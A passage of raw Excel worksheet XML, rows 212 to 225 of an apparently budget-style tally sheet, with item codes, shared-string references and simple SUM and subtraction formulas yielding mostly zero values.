      <c r="AC212" s="17"/>
      <c r="AD212" s="17"/>
      <c r="AE212" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AF212" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AG212" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AH212" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AI212" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AJ212" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AK212" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AL212" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AM212" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AN212" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AO212" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AP212" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
    </row>
    <row r="213" ht="18" customHeight="1" spans="1:42">
      <c r="A213" s="10">
        <v>103050102</v>
      </c>
      <c r="B213" s="16" t="s">
        <v>2838</v>
      </c>
      <c r="C213" s="17">
        <v>0</v>
      </c>
      <c r="D213" s="13">
        <v>2013703</v>
      </c>
      <c r="E213" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F213" s="14">
        <f t="shared" si="71"/>
        <v>0</v>
      </c>
      <c r="G213" s="17"/>
      <c r="H213" s="17"/>
      <c r="I213" s="17"/>
      <c r="J213" s="17"/>
      <c r="K213" s="17"/>
      <c r="L213" s="17"/>
      <c r="M213" s="17"/>
      <c r="N213" s="17"/>
      <c r="O213" s="17"/>
      <c r="P213" s="17"/>
      <c r="Q213" s="17"/>
      <c r="R213" s="17"/>
      <c r="S213" s="17"/>
      <c r="T213" s="17"/>
      <c r="U213" s="17"/>
      <c r="V213" s="17"/>
      <c r="W213" s="17"/>
      <c r="X213" s="17"/>
      <c r="Y213" s="17"/>
      <c r="Z213" s="17"/>
      <c r="AA213" s="17"/>
      <c r="AB213" s="17"/>
      <c r="AC213" s="17"/>
      <c r="AD213" s="17"/>
      <c r="AE213" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AF213" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AG213" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AH213" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AI213" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AJ213" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AK213" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AL213" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AM213" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AN213" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AO213" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AP213" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
    </row>
    <row r="214" ht="18" customHeight="1" spans="1:42">
      <c r="A214" s="10">
        <v>103050103</v>
      </c>
      <c r="B214" s="16" t="s">
        <v>2839</v>
      </c>
      <c r="C214" s="17">
        <v>0</v>
      </c>
      <c r="D214" s="13">
        <v>2013704</v>
      </c>
      <c r="E214" s="16" t="s">
        <v>2840</v>
      </c>
      <c r="F214" s="14">
        <f t="shared" si="71"/>
        <v>0</v>
      </c>
      <c r="G214" s="17"/>
      <c r="H214" s="17"/>
      <c r="I214" s="17"/>
      <c r="J214" s="17"/>
      <c r="K214" s="17"/>
      <c r="L214" s="17"/>
      <c r="M214" s="17"/>
      <c r="N214" s="17"/>
      <c r="O214" s="17"/>
      <c r="P214" s="17"/>
      <c r="Q214" s="17"/>
      <c r="R214" s="17"/>
      <c r="S214" s="17"/>
      <c r="T214" s="17"/>
      <c r="U214" s="17"/>
      <c r="V214" s="17"/>
      <c r="W214" s="17"/>
      <c r="X214" s="17"/>
      <c r="Y214" s="17"/>
      <c r="Z214" s="17"/>
      <c r="AA214" s="17"/>
      <c r="AB214" s="17"/>
      <c r="AC214" s="17"/>
      <c r="AD214" s="17"/>
      <c r="AE214" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AF214" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AG214" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AH214" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AI214" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AJ214" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AK214" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AL214" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AM214" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AN214" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AO214" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AP214" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
    </row>
    <row r="215" ht="18" customHeight="1" spans="1:42">
      <c r="A215" s="10">
        <v>103050105</v>
      </c>
      <c r="B215" s="16" t="s">
        <v>2841</v>
      </c>
      <c r="C215" s="17">
        <v>0</v>
      </c>
      <c r="D215" s="13">
        <v>2013750</v>
      </c>
      <c r="E215" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F215" s="14">
        <f t="shared" si="71"/>
        <v>0</v>
      </c>
      <c r="G215" s="17"/>
      <c r="H215" s="17"/>
      <c r="I215" s="17"/>
      <c r="J215" s="17"/>
      <c r="K215" s="17"/>
      <c r="L215" s="17"/>
      <c r="M215" s="17"/>
      <c r="N215" s="17"/>
      <c r="O215" s="17"/>
      <c r="P215" s="17"/>
      <c r="Q215" s="17"/>
      <c r="R215" s="17"/>
      <c r="S215" s="17"/>
      <c r="T215" s="17"/>
      <c r="U215" s="17"/>
      <c r="V215" s="17"/>
      <c r="W215" s="17"/>
      <c r="X215" s="17"/>
      <c r="Y215" s="17"/>
      <c r="Z215" s="17"/>
      <c r="AA215" s="17"/>
      <c r="AB215" s="17"/>
      <c r="AC215" s="17"/>
      <c r="AD215" s="17"/>
      <c r="AE215" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AF215" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AG215" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AH215" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AI215" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AJ215" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AK215" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AL215" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AM215" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AN215" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AO215" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AP215" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
    </row>
    <row r="216" ht="18" customHeight="1" spans="1:42">
      <c r="A216" s="10">
        <v>103050107</v>
      </c>
      <c r="B216" s="16" t="s">
        <v>2842</v>
      </c>
      <c r="C216" s="17">
        <v>0</v>
      </c>
      <c r="D216" s="13">
        <v>2013799</v>
      </c>
      <c r="E216" s="16" t="s">
        <v>2843</v>
      </c>
      <c r="F216" s="14">
        <f t="shared" si="71"/>
        <v>0</v>
      </c>
      <c r="G216" s="17"/>
      <c r="H216" s="17"/>
      <c r="I216" s="17"/>
      <c r="J216" s="17"/>
      <c r="K216" s="17"/>
      <c r="L216" s="17"/>
      <c r="M216" s="17"/>
      <c r="N216" s="17"/>
      <c r="O216" s="17"/>
      <c r="P216" s="17"/>
      <c r="Q216" s="17"/>
      <c r="R216" s="17"/>
      <c r="S216" s="17"/>
      <c r="T216" s="17"/>
      <c r="U216" s="17"/>
      <c r="V216" s="17"/>
      <c r="W216" s="17"/>
      <c r="X216" s="17"/>
      <c r="Y216" s="17"/>
      <c r="Z216" s="17"/>
      <c r="AA216" s="17"/>
      <c r="AB216" s="17"/>
      <c r="AC216" s="17"/>
      <c r="AD216" s="17"/>
      <c r="AE216" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AF216" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AG216" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AH216" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AI216" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AJ216" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AK216" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AL216" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AM216" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AN216" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AO216" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="AP216" s="17">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
    </row>
    <row r="217" ht="18" customHeight="1" spans="1:42">
      <c r="A217" s="10">
        <v>103050108</v>
      </c>
      <c r="B217" s="16" t="s">
        <v>2844</v>
      </c>
      <c r="C217" s="17">
        <v>0</v>
      </c>
      <c r="D217" s="13">
        <v>20138</v>
      </c>
      <c r="E217" s="11" t="s">
        <v>2845</v>
      </c>
      <c r="F217" s="14">
        <f t="shared" si="71"/>
        <v>8</v>
      </c>
      <c r="G217" s="12">
        <f t="shared" ref="G217:R217" si="81">SUM(G218:G231)</f>
        <v>3</v>
      </c>
      <c r="H217" s="12">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="I217" s="12">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="J217" s="12">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="K217" s="12">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="L217" s="12">
        <f t="shared" si="81"/>
        <v>5</v>
      </c>
      <c r="M217" s="12">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="N217" s="12">
        <f t="shared" si="81"/>
        <v>3</v>
      </c>
      <c r="O217" s="12">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="P217" s="12">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="Q217" s="12">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="R217" s="12">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="S217" s="12">
        <v>3</v>
      </c>
      <c r="T217" s="12">
        <v>0</v>
      </c>
      <c r="U217" s="12">
        <v>0</v>
      </c>
      <c r="V217" s="12">
        <v>0</v>
      </c>
      <c r="W217" s="12">
        <v>0</v>
      </c>
      <c r="X217" s="12">
        <v>5</v>
      </c>
      <c r="Y217" s="12">
        <v>0</v>
      </c>
      <c r="Z217" s="12">
        <v>3</v>
      </c>
      <c r="AA217" s="12">
        <v>0</v>
      </c>
      <c r="AB217" s="12">
        <v>0</v>
      </c>
      <c r="AC217" s="12">
        <v>0</v>
      </c>
      <c r="AD217" s="12">
        <v>0</v>
      </c>
      <c r="AE217" s="12">
        <f t="shared" ref="AE217:AP217" si="82">SUM(AE218:AE231)</f>
        <v>0</v>
      </c>
      <c r="AF217" s="12">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="AG217" s="12">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="AH217" s="12">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="AI217" s="12">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="AJ217" s="12">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="AK217" s="12">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="AL217" s="12">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="AM217" s="12">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="AN217" s="12">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="AO217" s="12">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="AP217" s="12">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
    </row>
    <row r="218" ht="18" customHeight="1" spans="1:42">
      <c r="A218" s="10">
        <v>103050109</v>
      </c>
      <c r="B218" s="16" t="s">
        <v>2846</v>
      </c>
      <c r="C218" s="17">
        <v>0</v>
      </c>
      <c r="D218" s="13">
        <v>2013801</v>
      </c>
      <c r="E218" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F218" s="14">
        <f t="shared" si="71"/>
        <v>0</v>
      </c>
      <c r="G218" s="17"/>
      <c r="H218" s="17"/>
      <c r="I218" s="17"/>
      <c r="J218" s="17"/>
      <c r="K218" s="17"/>
      <c r="L218" s="17"/>
      <c r="M218" s="17"/>
      <c r="N218" s="17"/>
      <c r="O218" s="17"/>
      <c r="P218" s="17"/>
      <c r="Q218" s="17"/>
      <c r="R218" s="17"/>
      <c r="S218" s="17"/>
      <c r="T218" s="17"/>
      <c r="U218" s="17"/>
      <c r="V218" s="17"/>
      <c r="W218" s="17"/>
      <c r="X218" s="17"/>
      <c r="Y218" s="17"/>
      <c r="Z218" s="17"/>
      <c r="AA218" s="17"/>
      <c r="AB218" s="17"/>
      <c r="AC218" s="17"/>
      <c r="AD218" s="17"/>
      <c r="AE218" s="17">
        <f t="shared" ref="AE218:AP231" si="83">G218-S218</f>
        <v>0</v>
      </c>
      <c r="AF218" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AG218" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AH218" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AI218" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AJ218" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AK218" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AL218" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AM218" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AN218" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AO218" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AP218" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
    </row>
    <row r="219" ht="18" customHeight="1" spans="1:42">
      <c r="A219" s="10">
        <v>103050110</v>
      </c>
      <c r="B219" s="16" t="s">
        <v>2847</v>
      </c>
      <c r="C219" s="17">
        <v>0</v>
      </c>
      <c r="D219" s="13">
        <v>2013802</v>
      </c>
      <c r="E219" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F219" s="14">
        <f t="shared" si="71"/>
        <v>0</v>
      </c>
      <c r="G219" s="17"/>
      <c r="H219" s="17"/>
      <c r="I219" s="17"/>
      <c r="J219" s="17"/>
      <c r="K219" s="17"/>
      <c r="L219" s="17"/>
      <c r="M219" s="17"/>
      <c r="N219" s="17"/>
      <c r="O219" s="17"/>
      <c r="P219" s="17"/>
      <c r="Q219" s="17"/>
      <c r="R219" s="17"/>
      <c r="S219" s="17"/>
      <c r="T219" s="17"/>
      <c r="U219" s="17"/>
      <c r="V219" s="17"/>
      <c r="W219" s="17"/>
      <c r="X219" s="17"/>
      <c r="Y219" s="17"/>
      <c r="Z219" s="17"/>
      <c r="AA219" s="17"/>
      <c r="AB219" s="17"/>
      <c r="AC219" s="17"/>
      <c r="AD219" s="17"/>
      <c r="AE219" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AF219" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AG219" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AH219" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AI219" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AJ219" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AK219" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AL219" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AM219" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AN219" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AO219" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AP219" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
    </row>
    <row r="220" ht="18" customHeight="1" spans="1:42">
      <c r="A220" s="10">
        <v>103050111</v>
      </c>
      <c r="B220" s="16" t="s">
        <v>2848</v>
      </c>
      <c r="C220" s="17">
        <v>0</v>
      </c>
      <c r="D220" s="13">
        <v>2013803</v>
      </c>
      <c r="E220" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F220" s="14">
        <f t="shared" si="71"/>
        <v>0</v>
      </c>
      <c r="G220" s="17"/>
      <c r="H220" s="17"/>
      <c r="I220" s="17"/>
      <c r="J220" s="17"/>
      <c r="K220" s="17"/>
      <c r="L220" s="17"/>
      <c r="M220" s="17"/>
      <c r="N220" s="17"/>
      <c r="O220" s="17"/>
      <c r="P220" s="17"/>
      <c r="Q220" s="17"/>
      <c r="R220" s="17"/>
      <c r="S220" s="17"/>
      <c r="T220" s="17"/>
      <c r="U220" s="17"/>
      <c r="V220" s="17"/>
      <c r="W220" s="17"/>
      <c r="X220" s="17"/>
      <c r="Y220" s="17"/>
      <c r="Z220" s="17"/>
      <c r="AA220" s="17"/>
      <c r="AB220" s="17"/>
      <c r="AC220" s="17"/>
      <c r="AD220" s="17"/>
      <c r="AE220" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AF220" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AG220" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AH220" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AI220" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AJ220" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AK220" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AL220" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AM220" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AN220" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AO220" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AP220" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
    </row>
    <row r="221" ht="18" customHeight="1" spans="1:42">
      <c r="A221" s="10">
        <v>103050112</v>
      </c>
      <c r="B221" s="16" t="s">
        <v>2849</v>
      </c>
      <c r="C221" s="17">
        <v>0</v>
      </c>
      <c r="D221" s="13">
        <v>2013804</v>
      </c>
      <c r="E221" s="16" t="s">
        <v>2850</v>
      </c>
      <c r="F221" s="14">
        <f t="shared" si="71"/>
        <v>0</v>
      </c>
      <c r="G221" s="17"/>
      <c r="H221" s="17"/>
      <c r="I221" s="17"/>
      <c r="J221" s="17"/>
      <c r="K221" s="17"/>
      <c r="L221" s="17"/>
      <c r="M221" s="17"/>
      <c r="N221" s="17"/>
      <c r="O221" s="17"/>
      <c r="P221" s="17"/>
      <c r="Q221" s="17"/>
      <c r="R221" s="17"/>
      <c r="S221" s="17"/>
      <c r="T221" s="17"/>
      <c r="U221" s="17"/>
      <c r="V221" s="17"/>
      <c r="W221" s="17"/>
      <c r="X221" s="17"/>
      <c r="Y221" s="17"/>
      <c r="Z221" s="17"/>
      <c r="AA221" s="17"/>
      <c r="AB221" s="17"/>
      <c r="AC221" s="17"/>
      <c r="AD221" s="17"/>
      <c r="AE221" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AF221" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AG221" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AH221" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AI221" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AJ221" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AK221" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AL221" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AM221" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AN221" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AO221" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AP221" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
    </row>
    <row r="222" ht="18" customHeight="1" spans="1:42">
      <c r="A222" s="10">
        <v>103050113</v>
      </c>
      <c r="B222" s="16" t="s">
        <v>2851</v>
      </c>
      <c r="C222" s="17">
        <v>0</v>
      </c>
      <c r="D222" s="13">
        <v>2013805</v>
      </c>
      <c r="E222" s="16" t="s">
        <v>2852</v>
      </c>
      <c r="F222" s="14">
        <f t="shared" si="71"/>
        <v>0</v>
      </c>
      <c r="G222" s="17"/>
      <c r="H222" s="17"/>
      <c r="I222" s="17"/>
      <c r="J222" s="17"/>
      <c r="K222" s="17"/>
      <c r="L222" s="17"/>
      <c r="M222" s="17"/>
      <c r="N222" s="17"/>
      <c r="O222" s="17"/>
      <c r="P222" s="17"/>
      <c r="Q222" s="17"/>
      <c r="R222" s="17"/>
      <c r="S222" s="17"/>
      <c r="T222" s="17"/>
      <c r="U222" s="17"/>
      <c r="V222" s="17"/>
      <c r="W222" s="17"/>
      <c r="X222" s="17"/>
      <c r="Y222" s="17"/>
      <c r="Z222" s="17"/>
      <c r="AA222" s="17"/>
      <c r="AB222" s="17"/>
      <c r="AC222" s="17"/>
      <c r="AD222" s="17"/>
      <c r="AE222" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AF222" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AG222" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AH222" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AI222" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AJ222" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AK222" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AL222" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AM222" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AN222" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AO222" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AP222" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
    </row>
    <row r="223" ht="18" customHeight="1" spans="1:42">
      <c r="A223" s="10">
        <v>103050114</v>
      </c>
      <c r="B223" s="16" t="s">
        <v>2853</v>
      </c>
      <c r="C223" s="17">
        <v>0</v>
      </c>
      <c r="D223" s="13">
        <v>2013808</v>
      </c>
      <c r="E223" s="16" t="s">
        <v>2622</v>
      </c>
      <c r="F223" s="14">
        <f t="shared" si="71"/>
        <v>0</v>
      </c>
      <c r="G223" s="17"/>
      <c r="H223" s="17"/>
      <c r="I223" s="17"/>
      <c r="J223" s="17"/>
      <c r="K223" s="17"/>
      <c r="L223" s="17"/>
      <c r="M223" s="17"/>
      <c r="N223" s="17"/>
      <c r="O223" s="17"/>
      <c r="P223" s="17"/>
      <c r="Q223" s="17"/>
      <c r="R223" s="17"/>
      <c r="S223" s="17"/>
      <c r="T223" s="17"/>
      <c r="U223" s="17"/>
      <c r="V223" s="17"/>
      <c r="W223" s="17"/>
      <c r="X223" s="17"/>
      <c r="Y223" s="17"/>
      <c r="Z223" s="17"/>
      <c r="AA223" s="17"/>
      <c r="AB223" s="17"/>
      <c r="AC223" s="17"/>
      <c r="AD223" s="17"/>
      <c r="AE223" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AF223" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AG223" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AH223" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AI223" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AJ223" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AK223" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AL223" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AM223" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AN223" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AO223" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AP223" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
    </row>
    <row r="224" ht="18" customHeight="1" spans="1:42">
      <c r="A224" s="10">
        <v>103050115</v>
      </c>
      <c r="B224" s="16" t="s">
        <v>2854</v>
      </c>
      <c r="C224" s="17">
        <v>0</v>
      </c>
      <c r="D224" s="13">
        <v>2013810</v>
      </c>
      <c r="E224" s="16" t="s">
        <v>2855</v>
      </c>
      <c r="F224" s="14">
        <f t="shared" si="71"/>
        <v>0</v>
      </c>
      <c r="G224" s="17"/>
      <c r="H224" s="17"/>
      <c r="I224" s="17"/>
      <c r="J224" s="17"/>
      <c r="K224" s="17"/>
      <c r="L224" s="17"/>
      <c r="M224" s="17"/>
      <c r="N224" s="17"/>
      <c r="O224" s="17"/>
      <c r="P224" s="17"/>
      <c r="Q224" s="17"/>
      <c r="R224" s="17"/>
      <c r="S224" s="17"/>
      <c r="T224" s="17"/>
      <c r="U224" s="17"/>
      <c r="V224" s="17"/>
      <c r="W224" s="17"/>
      <c r="X224" s="17"/>
      <c r="Y224" s="17"/>
      <c r="Z224" s="17"/>
      <c r="AA224" s="17"/>
      <c r="AB224" s="17"/>
      <c r="AC224" s="17"/>
      <c r="AD224" s="17"/>
      <c r="AE224" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AF224" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AG224" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AH224" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AI224" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AJ224" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AK224" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AL224" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AM224" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AN224" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AO224" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="AP224" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
    </row>
    <row r="225" ht="18" customHeight="1" spans="1:42">
      <c r="A225" s="10">
        <v>103050116</v>
      </c>
      <c r="B225" s="16" t="s">
        <v>2856</v>
      </c>
      <c r="C225" s="17">
        <v>0</v>
      </c>
      <c r="D225" s="13">
        <v>2013812</v>
      </c>
      <c r="E225" s="16" t="s">
        <v>2857</v>
      </c>
      <c r="F225" s="14">
        <f t="shared" si="71"/>
        <v>0</v>
      </c>
      <c r="G225" s="17"/>
      <c r="H225" s="17"/>
      <c r="I225" s="17"/>
      <c r="J225" s="17"/>
      <c r="K225" s="17"/>
      <c r="L225" s="17"/>
      <c r="M225" s="17"/>
      <c r="N225" s="17"/>
      <c r="O225" s="17"/>
      <c r="P225" s="17"/>
      <c r="Q225" s="17"/>
      <c r="R225" s="17"/>
      <c r="S225" s="17"/>
      <c r="T225" s="17"/>
      <c r="U225" s="17"/>
      <c r="V225" s="17"/>
      <c r="W225" s="17"/>
      <c r="X225" s="17"/>
      <c r="Y225" s="17"/>
      <c r="Z225" s="17"/>
      <c r="AA225" s="17"/>
      <c r="AB225" s="17"/>
      <c r="AC225" s="17"/>
      <c r="AD225" s="17"/>
      <c r="AE225" s="17">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
